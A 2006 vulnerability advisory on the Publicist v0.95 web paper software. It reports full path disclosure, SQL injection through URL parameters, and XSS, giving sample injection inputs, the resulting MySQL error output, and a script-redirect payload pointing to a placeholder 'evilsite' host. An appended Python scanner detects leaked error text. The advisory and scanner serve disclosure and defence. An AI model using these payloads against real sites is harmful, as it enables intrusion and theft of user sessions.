
Publicistv0.95.txt

Posted May 26, 2006
Authored by Luny

Publicist v0.95 suffers from full path disclosure, XSS, and SQL injection vulnerabilities.

tags | advisory, vulnerability, sql injection
SHA-256 | 416a475f3c96faf299d1daa790d2bc8ea03d0f8124783243545c490ba685e6f3

Publicist v0.95 

Homepage:
http://publicist.kau.se/

Description:
Publicist is a free web server software, created for web papers, that allows groups of people to write and publish together on the web (i.e. schools or single classes, clubs, or other groups who wish to express themselves).

--------------------------------------

Exploits & Vulnerabilities:

Full path and SQL Query errors:

Type the following in the login box: [BODY ONLOAD=alert('XSS')]
and it produces:

1064: You have an error in your SQL syntax near 'XSS')>'' at line 1
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.example.com/left.php on line 63

SQL injection on return variable: http://www.example.com/info.php?id=1147443203&return_=3'

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/html.publicist.kau.se/count.php on line 6
Unable to process query: You have an error in your SQL syntax near ''/info.php?id=1147443203&return_=3'', count=1' at line 1

SQL Injection on visa variable:
http://www.example.com/hitlist_editorial_public_info.php?visa=dan.akerlund'

Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/hitlist_editorial_public_info.php on line 73

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /var/www/examplesite.com/hitlist_editorial_public_info.php on line 74



Submitting HTML tags in the comment boxes produces this SQL query error:

1064: You have an error in your SQL syntax near 'evilcode'))>', c_show = '1', c_time = '1' at line 7



XSS Vulnerability:

An XSS attack is possible by entering HTML code like this in the comment box:

[IMG SRC=javascript:window.location('http://www.evilsite.com/evilcode.js')]

It should also be noted that calling the files c_getMsg.php, c_getUser.php and count.php displays full path errors that contain MySQL connection info:

Example of the above errors:

Warning: mysql_connect(): Access denied for user: 'example@localhost' (Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2
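
Added example (not part of the original advisory or of Publicist's code): a response-body check that a defender can run over pages from their own deployment to flag the three kinds of leaked error text quoted above, namely PHP warnings that expose server paths, echoed MySQL syntax errors, and database account names. The function name, finding labels and sample body are constructed for illustration.

```python
import re

# Constructed sample response body, modelled on the error output quoted in the advisory.
SAMPLE_BODY = (
    "1064: You have an error in your SQL syntax near 'XSS')>'' at line 1 "
    "Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result "
    "resource in /var/www/html.example.com/left.php on line 63\n"
    "Warning: mysql_connect(): Access denied for user: 'example@localhost' "
    "(Using password: YES) in /var/www/html.example.com/c_getUser.php on line 2\n"
)

# PHP warning that names a mysql_* function, a server-side file and a line number.
PHP_WARNING = re.compile(
    r"Warning:\s+(?P<func>mysql_\w+)\(\):.*?\bin\s+(?P<path>/\S+\.php)"
    r"\s+on line\s+(?P<line>\d+)",
    re.S,
)
# MySQL syntax error that echoes part of the query (and so the user's input).
SQL_SYNTAX = re.compile(
    r"You have an error in your SQL syntax near '(?P<near>.*?)' at line \d+", re.S
)
# Failed connection message that reveals the database account name.
DB_ACCOUNT = re.compile(r"Access denied for user:?\s+'(?P<user>[^'@]+)@(?P<host>[^']+)'")


def scan_response(body):
    """Return a list of findings (dicts) for error text leaked in a response body."""
    findings = []
    for m in PHP_WARNING.finditer(body):
        findings.append({"type": "full_path_disclosure", "function": m["func"],
                         "path": m["path"], "line": int(m["line"])})
    for m in SQL_SYNTAX.finditer(body):
        findings.append({"type": "sql_error_echo", "near": m["near"]})
    for m in DB_ACCOUNT.finditer(body):
        findings.append({"type": "db_account_disclosure",
                         "user": m["user"], "host": m["host"]})
    return findings


if __name__ == "__main__":
    for finding in scan_response(SAMPLE_BODY):
        print(finding)
```

Any finding means the application is returning raw PHP or MySQL errors to the client; the fix belongs in the application (parameterised queries, output encoding, errors logged rather than displayed), and the scan only confirms whether the leak is still present.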